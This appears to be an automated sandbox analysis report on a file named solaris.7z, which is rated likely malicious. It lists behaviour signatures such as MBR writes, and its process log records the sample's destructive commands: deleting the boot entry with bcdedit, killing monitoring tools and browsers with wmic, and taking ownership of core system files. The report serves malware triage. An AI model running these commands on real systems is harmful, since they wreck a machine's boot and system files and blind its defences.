Analysis Overview
Threat Level: Likely malicious
The file https://archive.org/details/solaris.7z was found to be: Likely malicious.
Malicious Activity Summary
Drops file in Drivers directory
Possible privilege escalation attempt
Downloads MZ/PE file
Executes dropped EXE
Modifies file permissions
Modifies boot configuration data using bcdedit
Legitimate hosting services abused for malware hosting/C2
Writes to the Master Boot Record (MBR)
Enumerates physical storage devices
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Modifies data under HKEY_USERS
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Modifies registry class
NTFS ADS
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-17 11:06
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-17 11:06
Reported
2024-06-17 11:08
Platform
win11-20240611-en
Max time kernel
109s
Max time network
108s
Command Line
Signatures
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Windows\System32\drivers\rteth.sys | C:\Windows\system32\cmd.exe | N/A |
Possible privilege escalation attempt
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\Downloads\0x07.exe | N/A |
| N/A | N/A | C:\Windows\Temp\winconfig.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DetectKey.exe | N/A |
Modifies file permissions
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\Downloads\0x07.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133630959976225828" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Users\Admin\Downloads\Solaris 2.0(1).z01:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\0x07.exe:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\solaris.7z_archive.torrent:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Solaris 2.0.z01:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://archive.org/details/solaris.7z
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff57c9ab58,0x7fff57c9ab68,0x7fff57c9ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1576 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2100 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3008 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3040 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3976 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3920 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4592 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4608 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4708 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Downloads\solaris.7z_archive.torrent"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\Admin\Downloads\solaris.7z_archive.torrent
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.0.1255573130\1104584131" -parentBuildID 20230214051806 -prefsHandle 1816 -prefMapHandle 1808 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {306f3244-0cdc-48e3-bd77-856750999af3} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 1692 27921624358 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.1.130520592\629183892" -parentBuildID 20230214051806 -prefsHandle 2412 -prefMapHandle 2408 -prefsLen 22925 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2a0395cc-1a68-4567-81da-ef9544c0b857} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 2424 2790d38a058 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.2.1275746739\19456807" -childID 1 -isForBrowser -prefsHandle 2940 -prefMapHandle 2936 -prefsLen 23028 -prefMapSize 235121 -jsInitHandle 1352 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {165faf58-3bd3-41e4-b247-1687c5fc6554} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 2952 27924538b58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.3.136152863\147203189" -childID 2 -isForBrowser -prefsHandle 3260 -prefMapHandle 2676 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1352 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {36d7590d-d716-454b-b959-3b47c54d116c} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 3312 27926bb8558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.4.898846559\550091554" -childID 3 -isForBrowser -prefsHandle 3380 -prefMapHandle 5116 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1352 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f0a2dc17-8951-4e5d-adeb-002ea334a4f3} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5128 2790d3e4858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.5.1114950978\2024425473" -childID 4 -isForBrowser -prefsHandle 5268 -prefMapHandle 5272 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1352 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a6444d9-66c6-4a56-a783-82458bcd37ed} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5260 2790d3e5a58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.6.2119703448\2051035194" -childID 5 -isForBrowser -prefsHandle 5464 -prefMapHandle 5468 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1352 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ebbc7003-dfd3-4e89-a4d3-539054643466} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5452 2790d3e6f58 tab
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4996 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4632 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5104 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Downloads\Solaris 2.0.z01"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Downloads\Solaris 2.0.z01"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2368.0.1506848468\107678083" -parentBuildID 20230214051806 -prefsHandle 1724 -prefMapHandle 1716 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a25e2286-3aa1-4fe0-887e-1481695ed5f3} 2368 "\\.\pipe\gecko-crash-server-pipe.2368" 1832 22a6d9ebc58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2368.1.365329882\1437661136" -parentBuildID 20230214051806 -prefsHandle 2340 -prefMapHandle 2336 -prefsLen 22925 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eaa21eef-f200-45b7-bb68-fd4a6178b867} 2368 "\\.\pipe\gecko-crash-server-pipe.2368" 2360 22a5a68a258 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2368.2.2021011797\658887305" -childID 1 -isForBrowser -prefsHandle 2904 -prefMapHandle 2900 -prefsLen 22963 -prefMapSize 235121 -jsInitHandle 1348 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {128ed8b5-2b26-4aad-aca5-31c6c18e0dba} 2368 "\\.\pipe\gecko-crash-server-pipe.2368" 2888 22a712e6e58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2368.3.666181311\866608131" -childID 2 -isForBrowser -prefsHandle 3552 -prefMapHandle 3548 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1348 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bffd2db9-4a34-49fc-9567-5930e803b96c} 2368 "\\.\pipe\gecko-crash-server-pipe.2368" 3564 22a741cb558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2368.4.724873211\954148448" -childID 3 -isForBrowser -prefsHandle 5196 -prefMapHandle 5192 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1348 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a339b070-7112-42ef-99a4-c820d8e6f2e1} 2368 "\\.\pipe\gecko-crash-server-pipe.2368" 5204 22a746ce558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2368.5.1858377365\2066612119" -childID 4 -isForBrowser -prefsHandle 5420 -prefMapHandle 5416 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1348 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5139762-4e65-4a65-b1b6-744cb438f098} 2368 "\\.\pipe\gecko-crash-server-pipe.2368" 5428 22a75e48c58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2368.6.1916752819\2099547351" -childID 5 -isForBrowser -prefsHandle 5604 -prefMapHandle 5600 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1348 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {27ae60ad-4f0f-49f1-ae5f-a299f76ebb1c} 2368 "\\.\pipe\gecko-crash-server-pipe.2368" 5612 22a75e49858 tab
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3132 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3464 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3112 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5580 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5488 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Users\Admin\Downloads\0x07.exe
"C:\Users\Admin\Downloads\0x07.exe"
C:\Windows\Temp\winconfig.exe
"C:\Windows\Temp\winconfig.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D82B.tmp\D82C.tmp\D82D.bat C:\Windows\Temp\winconfig.exe"
C:\Users\Admin\AppData\Roaming\DetectKey.exe
"C:\Users\Admin\AppData\Roaming\DetectKey.exe"
C:\Windows\system32\bcdedit.exe
bcdedit /delete {current}
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='taskmgr.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='perfmon.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='mmc.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='PartAssist.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='control.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='ProcessHacker.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='Security Task Manager.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='Security Task Manager Protable.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='CCleaner.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='procexp.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='procexp64.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='procexp64a.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='logonui.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='regedit.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='iexplore.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='chrome.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='firefox.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='opera.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='edge.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='msedge.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='brave.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='wmplayer.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='notepad.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='notepad++.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='taskmgr.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='perfmon.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='logonui.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='ProcessHacker.exe' delete /nointeractive
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\taskmgr.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\hal.dll"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\winload.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\ntoskrnl.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\perfmon.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\resmon.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\logonui.exe
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\taskkill.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\tasklist.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\tskill.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\logonui.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\Program Files\Process Hacker 2"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\drivers"
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='taskmgr.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='perfmon.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='logonui.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
